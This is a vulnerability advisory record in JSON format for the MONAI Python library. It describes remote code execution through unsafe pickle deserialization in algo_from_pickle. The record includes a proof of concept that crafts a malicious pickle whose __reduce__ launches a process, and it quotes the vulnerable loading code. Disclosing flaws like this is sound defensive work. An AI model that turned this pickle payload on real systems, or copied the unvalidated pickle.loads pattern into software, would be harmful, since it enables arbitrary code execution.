{"id":"GHSA-89gg-p5r5-q6r4","title":"MONAI: Unsafe functions lead to pickle deserialization rce","summary":"MONAI: Unsafe functions lead to pickle deserialization rce","severity":"high","cvss":7.6,"cvssVector":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H","vendor":"monai","product":"monai","ecosystem":"pip","affected":["monai < 1.6.0"],"patched":["monai 1.6.0"],"published":"2026-04-07","updated":"2026-07-31","source":"OSV","sourceUrl":"https://osv.dev/vulnerability/GHSA-89gg-p5r5-q6r4","references":[{"url":"https://github.com/Project-MONAI/MONAI/security/advisories/GHSA-89gg-p5r5-q6r4"},{"url":"https://github.com/Project-MONAI/MONAI/issues/8874#issuecomment-4752023161"},{"url":"https://github.com/Project-MONAI/MONAI/commit/9078a72f3992e49bd4560db510be9ec4ccf972cc"},{"url":"https://github.com/Project-MONAI/MONAI"},{"url":"https://github.com/Project-MONAI/MONAI/releases/tag/1.6.0"}],"tags":["osv","pip"],"ingestedAt":"2026-08-01T19:10:57.874Z","slug":"GHSA-89gg-p5r5-q6r4","body":"## Overview\n\n### Summary\nThe `algo_from_pickle` function in `monai/auto3dseg/utils.py` causes `pickle.loads(data_bytes)` to be executed, and it does not perform any validation on the input parameters. This ultimately leads to insecure deserialization and can result in code execution vulnerabilities.\n\n### Details\npoc\n```\nimport pickle\nimport subprocess\nclass MaliciousAlgo:\n    def __reduce__(self):\n        return (subprocess.call, (['calc.exe'],))\nmalicious_algo_bytes = pickle.dumps(MaliciousAlgo())\n\nattack_data = {\n    \"algo_bytes\": malicious_algo_bytes,  \n     \n}\nattack_pickle_file = \"attack_algo.pkl\"\nwith open(attack_pickle_file, \"wb\") as f:\n    f.write(pickle.dumps(attack_data))\n\n```\nGenerate the malicious file \"attack_algo.pkl\" through POC.\n\n```\nfrom monai.auto3dseg.utils import algo_from_pickle\n\n\nattack_pickle_file = \"attack_algo.pkl\"\nresult = algo_from_pickle(attack_pickle_file)\n```\nUltimately, it will trigger pickle.load through a file to identify the command execution.\n\n<img width=\"909\" height=\"534\" alt=\"image\" src=\"https://github.com/user-attachments/assets/071adbb7-3e40-4651-be48-abd2ce32470f\" />\n\nCauses of the vulnerability:\n```\ndef algo_from_pickle(pkl_filename: str, template_path: PathLike | None = None, **kwargs: Any) -> Any:\n\n    with open(pkl_filename, \"rb\") as f_pi:\n            data_bytes = f_pi.read()\n        data = pickle.loads(data_bytes)\n\n```\n\n\n\n### Impact\nArbitrary code execution\n\nRepair suggestions\nVerify the data source and content before deserializing, or use a safe deserialization method\n\n## Affected packages\n\n- `monai < 1.6.0`\n\n## Remediation\n\nUpgrade to a patched release:\n\n- `monai 1.6.0`","depth":"twilight","depthScore":42,"depthScoreParts":{"impact":41.8,"likelihood":0,"exploitation":0,"ransomware":0},"changes":[]}